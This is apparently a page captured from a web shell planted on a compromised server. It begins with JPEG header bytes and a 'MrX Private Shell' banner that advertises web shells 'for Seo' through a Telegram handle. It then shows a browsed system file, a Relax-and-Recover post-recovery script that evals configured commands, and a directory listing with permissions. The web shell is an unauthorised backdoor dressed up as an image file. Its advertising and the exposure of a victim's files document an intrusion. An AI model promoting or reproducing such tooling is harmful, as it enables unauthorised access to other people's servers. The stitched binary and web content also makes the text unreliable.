����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# The POST_RECOVERY_COMMANDS are called directly after the POST_RECOVERY_SCRIPT
# so POST_RECOVERY_COMMANDS can also be used to clean up things after the POST_RECOVERY_SCRIPT:
if test "$POST_RECOVERY_SCRIPT" ; then
LogPrint "Running POST_RECOVERY_SCRIPT '${POST_RECOVERY_SCRIPT[@]}'"
eval "${POST_RECOVERY_SCRIPT[@]}"
fi
local command
for command in "${POST_RECOVERY_COMMANDS[@]}" ; do
LogPrint "Running POST_RECOVERY_COMMANDS '$command'"
eval "$command"
done
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 500_post_recovery_script.sh | File | 479 B | 0644 |
|
| 980_good_bye.sh | File | 119 B | 0644 |
|
| 990_copy_logfile.sh | File | 4.66 KB | 0644 |
|